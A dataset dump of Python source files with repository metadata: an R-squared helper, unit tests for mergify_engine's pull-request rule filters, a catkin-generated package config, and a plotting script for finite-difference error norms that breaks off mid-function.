| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02d002f9923dc6fd98f78972ffbba5788efece66
| 113
|
py
|
Python
|
depictive/stats/goodness_of_fit.py
|
DEPICTIVE/depictive
|
8b517d599d44fb726b6ca3229b8c931fb2773301
|
[
"Apache-2.0"
] | 1
|
2020-07-14T03:06:33.000Z
|
2020-07-14T03:06:33.000Z
|
depictive/stats/goodness_of_fit.py
|
DEPICTIVE/depictive
|
8b517d599d44fb726b6ca3229b8c931fb2773301
|
[
"Apache-2.0"
] | null | null | null |
depictive/stats/goodness_of_fit.py
|
DEPICTIVE/depictive
|
8b517d599d44fb726b6ca3229b8c931fb2773301
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
def rsq(true, predictions):
    """Return the coefficient of determination (R^2) of *predictions*
    against the observed values *true*."""
    residuals = true - predictions
    return 1 - np.mean(residuals ** 2) / np.var(true)
| 16.142857
| 62
| 0.654867
| 18
| 113
| 4.111111
| 0.722222
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021978
| 0.19469
| 113
| 6
| 63
| 18.833333
| 0.791209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
02d43a8574732796093d9761a514807d226b3c54
| 16,653
|
py
|
Python
|
mergify_engine/tests/unit/rules/test_filter.py
|
oharboe/mergify-engine
|
70785b1b1d9b2360f7a41c6d7f560e39d9ec4905
|
[
"Apache-2.0"
] | null | null | null |
mergify_engine/tests/unit/rules/test_filter.py
|
oharboe/mergify-engine
|
70785b1b1d9b2360f7a41c6d7f560e39d9ec4905
|
[
"Apache-2.0"
] | null | null | null |
mergify_engine/tests/unit/rules/test_filter.py
|
oharboe/mergify-engine
|
70785b1b1d9b2360f7a41c6d7f560e39d9ec4905
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
#
# Copyright © 2018 Julien Danjou <jd@mergify.io>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from freezegun import freeze_time
import pytest
from mergify_engine.rules import filter
from mergify_engine.rules import parser
pytestmark = pytest.mark.asyncio
class FakePR(dict):  # type: ignore[type-arg]
    # Minimal pull-request stand-in for filter tests: exposes dict keys
    # through attribute access (missing keys raise KeyError, not
    # AttributeError).
    def __getattr__(self, k):
        return self[k]
async def test_binary() -> None:
    # "=" on a scalar attribute: exact equality.
    f = filter.BinaryFilter({"=": ("foo", 1)})
    assert await f(FakePR({"foo": 1}))
    assert not await f(FakePR({"foo": 2}))


async def test_string() -> None:
    # "=" also works on string values.
    f = filter.BinaryFilter({"=": ("foo", "bar")})
    assert await f(FakePR({"foo": "bar"}))
    assert not await f(FakePR({"foo": 2}))


async def test_not() -> None:
    # "-" negates the wrapped condition.
    f = filter.BinaryFilter({"-": {"=": ("foo", 1)}})
    assert not await f(FakePR({"foo": 1}))
    assert await f(FakePR({"foo": 2}))


async def test_len() -> None:
    # "#attr" compares the length of the attribute; a value without a
    # length (int) raises InvalidOperator.
    f = filter.BinaryFilter({"=": ("#foo", 3)})
    assert await f(FakePR({"foo": "bar"}))
    with pytest.raises(filter.InvalidOperator):
        await f(FakePR({"foo": 2}))
    assert not await f(FakePR({"foo": "a"}))
    assert not await f(FakePR({"foo": "abcedf"}))
    assert await f(FakePR({"foo": [10, 20, 30]}))
    assert not await f(FakePR({"foo": [10, 20]}))
    assert not await f(FakePR({"foo": [10, 20, 40, 50]}))
    # Same length operator combined with ">".
    f = filter.BinaryFilter({">": ("#foo", 3)})
    assert await f(FakePR({"foo": "barz"}))
    with pytest.raises(filter.InvalidOperator):
        await f(FakePR({"foo": 2}))
    assert not await f(FakePR({"foo": "a"}))
    assert await f(FakePR({"foo": "abcedf"}))
    assert await f(FakePR({"foo": [10, "abc", 20, 30]}))
    assert not await f(FakePR({"foo": [10, 20]}))
    assert not await f(FakePR({"foo": []}))


async def test_regexp() -> None:
    # "~=" matches against a regular expression; None does not match.
    f = filter.BinaryFilter({"~=": ("foo", "^f")})
    assert await f(FakePR({"foo": "foobar"}))
    assert await f(FakePR({"foo": "foobaz"}))
    assert not await f(FakePR({"foo": "x"}))
    assert not await f(FakePR({"foo": None}))
    # "^$" matches only the empty string.
    f = filter.BinaryFilter({"~=": ("foo", "^$")})
    assert await f(FakePR({"foo": ""}))
    assert not await f(FakePR({"foo": "x"}))


async def test_regexp_invalid() -> None:
    # A syntactically broken pattern is rejected at construction time.
    with pytest.raises(filter.InvalidArguments):
        filter.BinaryFilter({"~=": ("foo", r"([^\s\w])(\s*\1+")})
async def test_set_value_expanders() -> None:
    # A value expander rewrites the "@..."-style filter value before
    # comparison.
    f = filter.BinaryFilter(
        {"=": ("foo", "@bar")},
    )
    f.value_expanders["foo"] = lambda x: [x.replace("@", "foo")]
    assert await f(FakePR({"foo": "foobar"}))
    assert not await f(FakePR({"foo": "x"}))


async def test_set_value_expanders_unset_at_init() -> None:
    # Assigning the whole value_expanders dict after construction works too.
    f = filter.BinaryFilter({"=": ("foo", "@bar")})
    f.value_expanders = {"foo": lambda x: [x.replace("@", "foo")]}
    assert await f(FakePR({"foo": "foobar"}))
    assert not await f(FakePR({"foo": "x"}))


async def test_does_not_contain() -> None:
    # "!=" on a container: true when the value is absent.
    f = filter.BinaryFilter({"!=": ("foo", 1)})
    assert await f(FakePR({"foo": []}))
    assert await f(FakePR({"foo": [2, 3]}))
    assert not await f(FakePR({"foo": (1, 2)}))


async def test_set_value_expanders_does_not_contain() -> None:
    # Expanded values combine with "!=": any expansion match fails the filter.
    f = filter.BinaryFilter({"!=": ("foo", "@bar")})
    f.value_expanders["foo"] = lambda x: ["foobaz", "foobar"]
    assert not await f(FakePR({"foo": "foobar"}))
    assert not await f(FakePR({"foo": "foobaz"}))
    assert await f(FakePR({"foo": "foobiz"}))


async def test_contains() -> None:
    # "=" on a container: membership test.
    f = filter.BinaryFilter({"=": ("foo", 1)})
    assert await f(FakePR({"foo": [1, 2]}))
    assert not await f(FakePR({"foo": [2, 3]}))
    assert await f(FakePR({"foo": (1, 2)}))
    # ">" on a container: any element greater than the operand.
    f = filter.BinaryFilter({">": ("foo", 2)})
    assert not await f(FakePR({"foo": [1, 2]}))
    assert await f(FakePR({"foo": [2, 3]}))


async def test_unknown_attribute() -> None:
    # Evaluating against a PR lacking the attribute raises UnknownAttribute.
    f = filter.BinaryFilter({"=": ("foo", 1)})
    with pytest.raises(filter.UnknownAttribute):
        await f(FakePR({"bar": 1}))


async def test_parse_error() -> None:
    # An empty tree cannot be parsed.
    with pytest.raises(filter.ParseError):
        filter.BinaryFilter({})


async def test_unknown_operator() -> None:
    # Operators outside the supported set are rejected.
    with pytest.raises(filter.UnknownOperator):
        filter.BinaryFilter({"oops": (1, 2)})  # type: ignore[arg-type]


async def test_invalid_arguments() -> None:
    # Operand tuples must be (attribute, value) pairs.
    with pytest.raises(filter.InvalidArguments):
        filter.BinaryFilter({"=": (1, 2, 3)})  # type: ignore[typeddict-item]


async def test_str() -> None:
    # str() round-trips the filter back to its textual form; booleans
    # render as bare / "-"-prefixed attribute names.
    assert "foo~=^f" == str(filter.BinaryFilter({"~=": ("foo", "^f")}))
    assert "-foo=1" == str(filter.BinaryFilter({"-": {"=": ("foo", 1)}}))
    assert "foo" == str(filter.BinaryFilter({"=": ("foo", True)}))
    assert "-bar" == str(filter.BinaryFilter({"=": ("bar", False)}))
    # ">=" on a boolean has no textual form.
    with pytest.raises(filter.InvalidOperator):
        str(filter.BinaryFilter({">=": ("bar", False)}))
def time(hour: int, minute: int) -> datetime.time:
    """Build a timezone-aware (UTC) time-of-day for the given hour/minute."""
    utc = datetime.timezone.utc
    return datetime.time(hour=hour, minute=minute, tzinfo=utc)
def dtime(hour: int, minute: int) -> datetime.datetime:
    """Return 'now' (UTC clock) with hour/minute overridden and an
    explicit UTC timezone attached."""
    now = datetime.datetime.utcnow()
    return now.replace(hour=hour, minute=minute, tzinfo=datetime.timezone.utc)
@freeze_time("2012-01-14")
async def test_datetime_binary() -> None:
    # Datetime operands render in ISO form and compare chronologically.
    assert "foo>=2012-01-14T00:00:00" == str(
        filter.BinaryFilter({">=": ("foo", dtime(0, 0))})
    )
    assert "foo<=2012-01-14T23:59:00" == str(
        filter.BinaryFilter({"<=": ("foo", dtime(23, 59))})
    )
    assert "foo<=2012-01-14T03:09:00" == str(
        filter.BinaryFilter({"<=": ("foo", dtime(3, 9))})
    )
    # "<=" keeps everything at or before the operand.
    f = filter.BinaryFilter({"<=": ("foo", dtime(5, 8))})
    assert await f(FakePR({"foo": dtime(5, 8)}))
    assert await f(FakePR({"foo": dtime(2, 1)}))
    assert await f(FakePR({"foo": dtime(5, 1)}))
    assert not await f(FakePR({"foo": dtime(6, 2)}))
    assert not await f(FakePR({"foo": dtime(8, 9)}))
    # ">=" keeps everything at or after the operand.
    f = filter.BinaryFilter({">=": ("foo", dtime(5, 8))})
    assert await f(FakePR({"foo": dtime(5, 8)}))
    assert not await f(FakePR({"foo": dtime(2, 1)}))
    assert not await f(FakePR({"foo": dtime(5, 1)}))
    assert await f(FakePR({"foo": dtime(6, 2)}))
    assert await f(FakePR({"foo": dtime(8, 9)}))


@freeze_time("2012-01-14")
async def test_time_binary() -> None:
    # Time-of-day operands render as HH:MM and compare like datetimes.
    assert "foo>=00:00" == str(filter.BinaryFilter({">=": ("foo", time(0, 0))}))
    assert "foo<=23:59" == str(filter.BinaryFilter({"<=": ("foo", time(23, 59))}))
    assert "foo<=03:09" == str(filter.BinaryFilter({"<=": ("foo", time(3, 9))}))
    # "<=" keeps everything at or before the operand.
    f = filter.BinaryFilter({"<=": ("foo", time(5, 8))})
    assert await f(FakePR({"foo": time(5, 8)}))
    assert await f(FakePR({"foo": time(2, 1)}))
    assert await f(FakePR({"foo": time(5, 1)}))
    assert not await f(FakePR({"foo": time(6, 2)}))
    assert not await f(FakePR({"foo": time(8, 9)}))
    # ">=" keeps everything at or after the operand.
    f = filter.BinaryFilter({">=": ("foo", time(5, 8))})
    assert await f(FakePR({"foo": time(5, 8)}))
    assert not await f(FakePR({"foo": time(2, 1)}))
    assert not await f(FakePR({"foo": time(5, 1)}))
    assert await f(FakePR({"foo": time(6, 2)}))
    assert await f(FakePR({"foo": time(8, 9)}))
@freeze_time("2012-01-14T12:15:00")
async def test_time_near_datetime() -> None:
    # NearDatetimeFilter returns the next datetime at which the filter's
    # truth value may change, given a time-of-day condition.
    atmidnight = datetime.datetime(
        2012, 1, 15, 0, 0, 0, 0, tzinfo=datetime.timezone.utc
    )
    nextday = datetime.datetime(2012, 1, 15, 5, 8, 0, 0, tzinfo=datetime.timezone.utc)
    today = datetime.datetime(2012, 1, 14, 5, 8, 0, 0, tzinfo=datetime.timezone.utc)
    soon = datetime.datetime(2012, 1, 14, 5, 9, 0, 0, tzinfo=datetime.timezone.utc)
    f = filter.NearDatetimeFilter({"<=": ("foo", today.timetz())})
    assert await f(FakePR({"foo": time(5, 8)})) == soon
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(5, 1)})) == today
    assert await f(FakePR({"foo": time(6, 2)})) == atmidnight
    assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
    f = filter.NearDatetimeFilter({"<": ("foo", today.timetz())})
    assert await f(FakePR({"foo": time(5, 8)})) == atmidnight
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(5, 1)})) == today
    assert await f(FakePR({"foo": time(6, 2)})) == atmidnight
    assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
    f = filter.NearDatetimeFilter({">=": ("foo", today.timetz())})
    assert await f(FakePR({"foo": time(5, 8)})) == soon
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(5, 1)})) == today
    assert await f(FakePR({"foo": time(6, 2)})) == atmidnight
    assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
    f = filter.NearDatetimeFilter({">": ("foo", today.timetz())})
    assert await f(FakePR({"foo": time(5, 8)})) == atmidnight
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(5, 1)})) == today
    assert await f(FakePR({"foo": time(6, 2)})) == atmidnight
    assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
    # Equality/inequality conditions can only flip again the next day
    # once the target time has passed.
    f = filter.NearDatetimeFilter({"=": ("foo", today.timetz())})
    assert await f(FakePR({"foo": time(5, 8)})) == soon
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(5, 1)})) == today
    assert await f(FakePR({"foo": time(6, 2)})) == nextday
    assert await f(FakePR({"foo": time(8, 9)})) == nextday
    f = filter.NearDatetimeFilter({"!=": ("foo", today.timetz())})
    assert await f(FakePR({"foo": time(5, 8)})) == soon
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(5, 1)})) == today
    assert await f(FakePR({"foo": time(6, 2)})) == nextday
    assert await f(FakePR({"foo": time(8, 9)})) == nextday


@freeze_time("2012-01-14T12:15:00")
async def test_datetime_near_datetime() -> None:
    # With an absolute datetime operand there is no daily recurrence:
    # once the moment is past, DT_MAX (never again) is returned.
    today = datetime.datetime(2012, 1, 14, 5, 8, 0, 0, tzinfo=datetime.timezone.utc)
    soon = datetime.datetime(2012, 1, 14, 5, 9, 0, 0, tzinfo=datetime.timezone.utc)
    f = filter.NearDatetimeFilter({"<=": ("foo", today)})
    assert await f(FakePR({"foo": dtime(5, 8)})) == soon
    assert await f(FakePR({"foo": dtime(2, 1)})) == today
    assert await f(FakePR({"foo": dtime(5, 1)})) == today
    assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
    assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
    f = filter.NearDatetimeFilter({"<": ("foo", today)})
    assert await f(FakePR({"foo": dtime(5, 8)})) == filter.DT_MAX
    assert await f(FakePR({"foo": dtime(2, 1)})) == today
    assert await f(FakePR({"foo": dtime(5, 1)})) == today
    assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
    assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
    f = filter.NearDatetimeFilter({">=": ("foo", today)})
    assert await f(FakePR({"foo": dtime(5, 8)})) == soon
    assert await f(FakePR({"foo": dtime(2, 1)})) == today
    assert await f(FakePR({"foo": dtime(5, 1)})) == today
    assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
    assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
    f = filter.NearDatetimeFilter({">": ("foo", today)})
    assert await f(FakePR({"foo": dtime(5, 8)})) == filter.DT_MAX
    assert await f(FakePR({"foo": dtime(2, 1)})) == today
    assert await f(FakePR({"foo": dtime(5, 1)})) == today
    assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
    assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
    f = filter.NearDatetimeFilter({"=": ("foo", today)})
    assert await f(FakePR({"foo": dtime(5, 8)})) == soon
    assert await f(FakePR({"foo": dtime(2, 1)})) == today
    assert await f(FakePR({"foo": dtime(5, 1)})) == today
    assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
    assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
    f = filter.NearDatetimeFilter({"!=": ("foo", today)})
    assert await f(FakePR({"foo": dtime(5, 8)})) == soon
    assert await f(FakePR({"foo": dtime(2, 1)})) == today
    assert await f(FakePR({"foo": dtime(5, 1)})) == today
    assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
    assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX


@freeze_time("2012-01-14T12:05:00")
async def test_multiple_near_datetime() -> None:
    # With "and"/"or" trees the nearest relevant boundary is reported,
    # regardless of the combinator (same expectations for all four combos).
    atmidnight = datetime.datetime(
        2012, 1, 15, 0, 0, 0, 0, tzinfo=datetime.timezone.utc
    )
    today = datetime.datetime(2012, 1, 14, 5, 8, 0, 0, tzinfo=datetime.timezone.utc)
    in_two_hours = datetime.datetime(
        2012, 1, 14, 7, 5, 0, 0, tzinfo=datetime.timezone.utc
    )
    soon = datetime.datetime(2012, 1, 14, 5, 9, 0, 0, tzinfo=datetime.timezone.utc)
    f = filter.NearDatetimeFilter(
        {
            "or": [
                {"<=": ("foo", in_two_hours.timetz())},
                {"<=": ("foo", today.timetz())},
            ]
        }
    )
    assert await f(FakePR({"foo": time(5, 8)})) == soon
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(6, 8)})) == in_two_hours
    assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
    assert await f(FakePR({"foo": time(18, 9)})) == atmidnight
    f = filter.NearDatetimeFilter(
        {
            "and": [
                {">=": ("foo", in_two_hours.timetz())},
                {">=": ("foo", today.timetz())},
            ]
        }
    )
    assert await f(FakePR({"foo": time(5, 8)})) == soon
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(6, 8)})) == in_two_hours
    assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
    assert await f(FakePR({"foo": time(18, 9)})) == atmidnight
    f = filter.NearDatetimeFilter(
        {
            "or": [
                {">=": ("foo", in_two_hours.timetz())},
                {">=": ("foo", today.timetz())},
            ]
        }
    )
    assert await f(FakePR({"foo": time(5, 8)})) == soon
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(6, 8)})) == in_two_hours
    assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
    assert await f(FakePR({"foo": time(18, 9)})) == atmidnight
    f = filter.NearDatetimeFilter(
        {
            "and": [
                {"<=": ("foo", in_two_hours.timetz())},
                {"<=": ("foo", today.timetz())},
            ]
        }
    )
    assert await f(FakePR({"foo": time(5, 8)})) == soon
    assert await f(FakePR({"foo": time(2, 1)})) == today
    assert await f(FakePR({"foo": time(6, 8)})) == in_two_hours
    assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
    assert await f(FakePR({"foo": time(18, 9)})) == atmidnight
async def test_or() -> None:
f = filter.BinaryFilter({"or": ({"=": ("foo", 1)}, {"=": ("bar", 1)})})
assert await f(FakePR({"foo": 1, "bar": 1}))
assert not await f(FakePR({"bar": 2, "foo": 2}))
assert await f(FakePR({"bar": 2, "foo": 1}))
assert await f(FakePR({"bar": 1, "foo": 2}))
async def test_and() -> None:
f = filter.BinaryFilter({"and": ({"=": ("foo", 1)}, {"=": ("bar", 1)})})
assert await f(FakePR({"bar": 1, "foo": 1}))
assert not await f(FakePR({"bar": 2, "foo": 2}))
assert not await f(FakePR({"bar": 2, "foo": 1}))
assert not await f(FakePR({"bar": 1, "foo": 2}))
with pytest.raises(filter.ParseError):
filter.BinaryFilter({"or": {"foo": "whar"}})
async def test_chain() -> None:
f1 = {"=": ("bar", 1)}
f2 = {"=": ("foo", 1)}
f = filter.BinaryFilter({"and": (f1, f2)})
assert await f(FakePR({"bar": 1, "foo": 1}))
assert not await f(FakePR({"bar": 2, "foo": 2}))
assert not await f(FakePR({"bar": 2, "foo": 1}))
assert not await f(FakePR({"bar": 1, "foo": 2}))
async def test_parser_leaf() -> None:
    """Parsing a leaf expression and stringifying the filter round-trips."""
    samples = ("head=foobar", "-base=master", "#files>3")
    for sample in samples:
        tree = parser.search.parseString(sample, parseAll=True)[0]
        assert sample == str(filter.BinaryFilter(tree))
async def test_parser_group() -> None:
    """A binary ``and`` tree renders as a parenthesised group."""
    flt = filter.BinaryFilter(
        {"and": ({"=": ("head", "foobar")}, {">": ("#files", 3)})}
    )
    assert str(flt) == "(head=foobar and #files>3)"
| 39.183529
| 87
| 0.577974
| 2,310
| 16,653
| 4.122944
| 0.08961
| 0.097018
| 0.194036
| 0.223646
| 0.818249
| 0.76575
| 0.727215
| 0.694246
| 0.603528
| 0.603528
| 0
| 0.042071
| 0.196421
| 16,653
| 424
| 88
| 39.275943
| 0.669556
| 0.040113
| 0
| 0.466258
| 0
| 0
| 0.075473
| 0.00451
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.009202
| false
| 0
| 0.015337
| 0.009202
| 0.03681
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02dafc8b81707ec619b103534acbbba814024db5
| 1,142
|
py
|
Python
|
catkin_ws/build/srrg2_solver/catkin_generated/pkg.develspace.context.pc.py
|
laaners/progetto-labiagi_pick_e_delivery
|
3453bfbc1dd7562c78ba06c0f79b069b0a952c0e
|
[
"MIT"
] | null | null | null |
catkin_ws/build/srrg2_solver/catkin_generated/pkg.develspace.context.pc.py
|
laaners/progetto-labiagi_pick_e_delivery
|
3453bfbc1dd7562c78ba06c0f79b069b0a952c0e
|
[
"MIT"
] | null | null | null |
catkin_ws/build/srrg2_solver/catkin_generated/pkg.develspace.context.pc.py
|
laaners/progetto-labiagi_pick_e_delivery
|
3453bfbc1dd7562c78ba06c0f79b069b0a952c0e
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
# pkg-config context values for the srrg2_solver catkin develspace.


def _semicolon_list(raw):
    # Catkin templates expand to "" for an empty list; map that to [].
    return raw.split(';') if raw != "" else []


CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = _semicolon_list("/home/alessiohu/Desktop/progetto-labiagi/catkin_ws/src/srrg2_solver/srrg2_solver/src")
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = _semicolon_list("-lsrrg2_solver_core_library;-lsrrg2_solver_types2d_library;-lsrrg2_solver_types3d_library;-lsrrg2_solver_calib_library;-lsrrg2_solver_projective_library;-lsrrg2_solver_factor_graph_utils_library;-lsrrg2_solver_linear_solvers_library;-lsrrg2_solver_sparse_block_matrix_library")
PROJECT_NAME = "srrg2_solver"
PROJECT_SPACE_DIR = "/home/alessiohu/Desktop/progetto-labiagi/catkin_ws/devel/.private/srrg2_solver"
PROJECT_VERSION = "0.8.0"
| 126.888889
| 618
| 0.854641
| 155
| 1,142
| 5.76129
| 0.348387
| 0.215006
| 0.297872
| 0.094065
| 0.724524
| 0.724524
| 0.724524
| 0.676372
| 0.676372
| 0.676372
| 0
| 0.026292
| 0.034151
| 1,142
| 8
| 619
| 142.75
| 0.783318
| 0.047285
| 0
| 0
| 1
| 0
| 0.752302
| 0.732965
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
02eb3b4c76bfe332ceabb9ab2661fd00d3ded333
| 20,386
|
py
|
Python
|
data_plotting/plot_errors_norms_cfa2018.py
|
qgoestch/sinecity_testcases
|
ec04ba707ff69b5c1b4b42e56e522855a2f34a65
|
[
"BSD-3-Clause"
] | null | null | null |
data_plotting/plot_errors_norms_cfa2018.py
|
qgoestch/sinecity_testcases
|
ec04ba707ff69b5c1b4b42e56e522855a2f34a65
|
[
"BSD-3-Clause"
] | null | null | null |
data_plotting/plot_errors_norms_cfa2018.py
|
qgoestch/sinecity_testcases
|
ec04ba707ff69b5c1b4b42e56e522855a2f34a65
|
[
"BSD-3-Clause"
] | 1
|
2021-02-18T13:07:10.000Z
|
2021-02-18T13:07:10.000Z
|
# -*- coding: utf-8 -*-
##
# \file plot_errors_norms_cfa2018.py
# \title Errors and norms for each case: _cfa2018 only 2-norm and max-norm
# \author Pierre Chobeau
# \version 0.1
# \license BSD 3-Clause License
# \inst UMRAE (Ifsttar Nantes), LAUM (Le Mans Université)
# \date 2018, 15 Mar.
##
import numpy as np
import matplotlib.ticker
from matplotlib import pyplot as plt
import os
# Directory containing this script; result folders are resolved relative
# to it. The original split the dirname on os.path.sep and re-joined it
# with a Python-2-only bare ``reduce`` — an identity transformation that
# raises NameError under Python 3. The direct form below is equivalent.
base_path = os.path.dirname(os.path.realpath(__file__))
def plot_error_basic_cfa2018(h_set, one_norm, two_norm, max_norm,
                             ord_acc_one, ord_acc_two, ord_acc_max,
                             case, save_fig):
    """
    Plot the FD error norms and observed orders of accuracy (cfa2018).

    Figure 1 shows the 2-norm (left) and max-norm (right) of the error as
    a function of the spatial step, against a theoretical 2nd-order slope.
    Figure 2 shows the observed order of accuracy between consecutive
    grids for both norms.

    :param h_set: spatial step sequence (m); assumed to be a numpy array
        (element-wise ``h_set / h_set[j]`` is used) — TODO confirm.
    :param one_norm: relative error in the 1-norm for each spatial step.
    :type one_norm: 1d-array
    :param two_norm: relative error in the 2-norm for each spatial step.
    :type two_norm: 1d-array
    :param max_norm: relative error in the MAX-norm for each spatial step.
    :type max_norm: 1d-array
    :param ord_acc_one: order of accuracy in the 1-norm between two
        consecutive grids (accepted but not plotted here).
    :param ord_acc_two: order of accuracy in the 2-norm between two
        consecutive grids.
    :param ord_acc_max: order of accuracy in the max-norm between two
        consecutive grids.
    :param case: integer that sorts the saved folders in the results dir.
    :type case: int
    :param save_fig: save or not the figure.
    :type save_fig: bool
    :return: None; shows (and optionally saves) two figures.
    """
    # ``print`` as a function: valid in both Python 2 and 3 (the original
    # Python-2 print statements broke under Python 3).
    print('Plotting the errors')
    h_th = np.linspace(h_set[0] - 0.001, h_set[-1] + 0.001, 100)
    j = 2  # reference grid index for the theoretical convergence slope
    # =========================================================================
    # All grids figure
    # =========================================================================
    fig = plt.figure('Errors', figsize=(9., 4.))
    ax = fig.add_subplot(121)
    ax.loglog(h_set, two_norm[:], 'bd',
              markersize=4, markeredgewidth=1.2, markeredgecolor='b',
              markerfacecolor='None')
    # NOTE(review): (h_set[j] / h_set[j]) ** 2 is always 1, so the margin
    # reduces to 0.02 * one_norm[j]; possibly a typo for (h_th / h_set[j]).
    error_margin = 0.02 * (h_set[j] / h_set[j]) ** 2 * one_norm[j]
    # Theoretical 2nd-order curve with margin; computed but not plotted.
    scnd_ord_th = (h_set / h_set[j]) ** 2 * two_norm[j] + error_margin
    ax.loglog(h_th, (h_th / h_set[j]) ** 2 * two_norm[j], 'k-', lw=1.5)
    plt.legend(('FD', '2nd order'), fontsize=14)
    # =========================================================================
    # Linear regression on log log
    # =========================================================================
    # Fitted values kept for the commented-out diagnostic plot below.
    coefs = np.polyfit(h_set, two_norm, 1)
    poly = np.poly1d(coefs)
    ys = poly(h_set)
    m, c = np.polyfit(h_set, np.log10(two_norm), 1)  # fit log(y) = m*log(x) + c
    y_fit = np.power(10, m * h_set + c)  # calculate the fitted values of y
    # print(m, c)
    # plt.plot(h_set, y_fit, 'y--', lw=3)
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel(r'$||error||_{2}$', fontsize=12)
    plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.001)
    plt.ylim(10 ** -7, 10 ** -1)
    plt.tight_layout()
    ax = fig.add_subplot(122)
    ax.loglog(h_th, (h_th / h_set[j]) ** 2 * max_norm[j], 'k-', lw=1.5)
    ax.loglog(h_set, max_norm[:], 'bd',
              markersize=4, markeredgewidth=1.2, markeredgecolor='b',
              markerfacecolor='None')
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel(r'$||error||_{max}$', fontsize=12)
    plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.001)
    plt.ylim(10 ** -7, 10 ** -1)
    plt.tight_layout()
    if save_fig:
        print('Saving figures')
        res_path = os.path.join(base_path.rsplit(os.sep, 1)[0],
                                'results', 'case%i' % case, 'figures')
        if not os.path.exists(res_path):
            os.makedirs(res_path)
        plt.savefig(os.path.join(res_path, 'errors_fd_cfa2018.eps'),
                    transparent=True, bbox_inches='tight', pad_inches=0)
        plt.savefig(os.path.join(res_path, 'errors_fd_cfa2018.png'),
                    transparent=True, bbox_inches='tight', pad_inches=0)
        plt.savefig(os.path.join(res_path, 'errors_fd_cfa2018.pdf'),
                    transparent=True, bbox_inches='tight', pad_inches=0)
    # =========================================================================
    # Order of accuracy btw. 2 consecutive points
    # =========================================================================
    fig = plt.figure('Order of accuracy', figsize=(9., 4.))
    ax = fig.add_subplot(121)
    ax.semilogx(h_set[:-1], ord_acc_two[:], 'bd',
